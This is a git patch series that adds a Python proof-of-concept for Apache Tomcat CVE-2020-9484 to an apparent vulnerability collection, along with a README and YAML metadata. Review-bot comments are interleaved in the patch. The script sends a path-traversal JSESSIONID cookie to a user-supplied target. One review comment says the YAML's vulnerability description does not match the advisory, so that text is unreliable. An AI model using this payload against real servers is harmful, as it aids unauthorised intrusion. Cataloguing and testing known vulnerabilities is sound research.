From f39d2755f0567bab8da95678b7685a989e244e52 Mon Sep 17 00:00:00 2001
From: buaa-yy
Date: Fri, 10 Mar 2023 19:45:44 +0800
Subject: [PATCH 1/2] add CVE-2020-9484
---
 .../2020/CVE-2020-9484/CVE-2020-9484.py | 37 +++++++++++++++++++
 .../2020/CVE-2020-9484/README.md | 13 +++++++
 .../2020/yaml/CVE-2020-9484.yaml | 19 ++++++++++
 openkylin_list.yaml | 2 +
 4 files changed, 71 insertions(+)
 create mode 100755 cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
 create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/README.md
 create mode 100644 cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
new file mode 100755
index 00000000..084b803f
--- /dev/null
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py
@@ -0,0 +1,37 @@
+import requests
+import os, sys
+
+
+
+def main():
+ print("CVE: CVE-2020-9484")
+ RHOST = input("Target : ")
+ try:
+ u = requests.get(f"{RHOST}/index.jsp")
+ if u.status_code == 200:
+ print("Found Index Page")
+ pass
+ elif u.status_code == 404:
+ print("Looks Like we Could not Find index Page")
+ sys.exit()
+ header = {
+ "Cookie": "JSESSIONID=../../../../../usr/local/tomcat/groovy"
+ }
+ sett = requests.get(f"{RHOST}/index.jsp", headers=header)
+ if sett.status_code == 200:
+ print(sett.text)
+ #os.system(f"curl '{RHOST}/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' | grep -oh 'java' | sort -u == 'java' | tee result.txt | -o /dev/null")
+ #print("If Any Results They Will be Saved in result.txt")
+ print("Output ^")
+ if sett.status_code == 500:
+ print("Patched")
+ sys.exit()
+
+ if sett.text == " ":
+ print("No Content")
+ pass
+
+ except Exception as e:
+ print("Looks Like there Was A Problem Connecting to Target")
+
+main()
diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/README.md b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
new file mode 100644
index 00000000..1f18c3ce
--- /dev/null
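Review bot: In CVE-2020-9484.py the `except Exception as e:` wrapped around the whole body of main() reports every failure as a connection problem and discards `e`, so a target typed without a scheme, a TLS failure and a plain bug in the script all print the same line; both `requests.get` calls also run without a timeout and can block indefinitely. Narrow the handler to `except requests.RequestException as e:` with `print(f"Request failed: {e}")`, and pass `timeout=10` (value is a suggestion) to both calls. The verdicts rest on the status code alone: a 500 prints "Patched" and a 200 dumps the body, but nothing in the visible code ties either status to the Tomcat version or its session-store configuration, so the output should not be recorded as evidence of patch status; compare the deployed version against the affected ranges instead. `import os` is unused now that the `os.system` line is commented out, and the bare `main()` at the bottom belongs under `if __name__ == "__main__":` so the module can be imported without prompting for input.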
+++ b/cve/apache-tomcat/2020/CVE-2020-9484/README.md
@@ -0,0 +1,13 @@
+# Tomcat-RCE
+Apache Tomcat RCE
+#Use
+Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。攻击者可能可以构造恶意请求,造成反序列化代码执行漏洞。
+[-] Apache Tomcat RCE漏洞 (CVE-2020-9484)
+
+
+# eg
+
+python3 CVE-2020-9484.py
+
+# reference
+code from: https://github.com/RepublicR0K/CVE-2020-9484
diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
new file mode 100644
index 00000000..9b2a0885
--- /dev/null
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
@@ -0,0 +1,19 @@
+id: CVE-2020-9484
+source: https://github.com/RepublicR0K/CVE-2020-9484
+info:
+ name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+ severity: high
+ description:
+ 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
+ scope-of-influence:
+ Apache Tomcat < 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54, 7.0.0 to 7.0.103
+ reference:
+ - https://seclists.org/oss-sec/2020/q2/136
+ - https://www.seebug.org/vuldb/ssvid-98234
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2020-9484
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020,Apache,Tomcat,RCE
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f822acc2..ff187cba 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -8,6 +8,8 @@ cve:
 - CVE-2022-24112
 apache-solr:
 - CVE-2021-27905
+ apache-tomcat:
+ - CVE-2020-9484
 linux-kernel:
 - CVE-2021-4204
 - CVE-2021-22555
-- Gitee
From 4b8d79784ddb912086ee46fbc4b604eb9f5a5f2b Mon Sep 17 00:00:00 2001
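Review bot: The `name` and `description` values in cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml describe deserialization through Tomcat's built-in session synchronisation when EncryptInterceptor is not configured, which does not match the Apache advisory for CVE-2020-9484 as I know it; that advisory concerns the PersistenceManager with a FileStore deserializing a file whose name and contents an attacker controls. The mismatch matters for triage, because someone checking only for session replication would miss the PersistenceManager/FileStore precondition that decides whether a host is exposed. `name` also holds a full paragraph where a short title is expected, for example `name: Apache Tomcat session persistence deserialization`. In `scope-of-influence` the stray `<` before the first range (`Apache Tomcat < 10.0.0-M1 to 10.0.0-M4`) makes the range ambiguous and should be dropped.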
From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?=
Date: Mon, 13 Mar 2023 06:53:36 +0000
Subject: [PATCH 2/2] update cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 于越
---
 cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
index 9b2a0885..e4cf2843 100644
--- a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
+++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml
@@ -11,9 +11,10 @@ info:
 - https://seclists.org/oss-sec/2020/q2/136
 - https://www.seebug.org/vuldb/ssvid-98234
 classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
+ cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.0
 cve-id: CVE-2020-9484
+ cwe-id: CWE-502
 cnvd-id: None
 kve-id: None
- tags: cve2020,Apache,Tomcat,RCE
+ tags: cve2020, Apache, Tomcat, RCE
-- Gitee